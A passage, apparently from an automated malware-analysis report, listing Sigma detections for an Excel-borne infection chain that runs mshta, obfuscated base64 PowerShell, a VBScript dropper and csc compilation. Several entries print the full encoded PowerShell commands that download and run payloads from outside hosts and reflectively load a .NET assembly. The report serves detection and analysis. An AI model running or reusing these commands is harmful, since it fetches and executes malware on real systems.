cxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9y
        Sigma detected: File With Uncommon Extension Created By An Office Application
        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta
        Sigma detected: Potentially Suspicious PowerShell Child Processes
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , ProcessId: 4044, ProcessName: wscript.exe
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9y
        Sigma detected: Suspicious MSHTA Child Process
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICA
        Sigma detected: Suspicious Microsoft Office Child Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3312, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3592, ProcessName: mshta.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , ProcessId: 4044, ProcessName: wscript.exe
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline", ProcessId: 3920, ProcessName: csc.exe
        Sigma detected: Excel Network Connections
        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3716, TargetFilename: C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS
        Sigma detected: Suspicious Office Outbound Connections
        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1O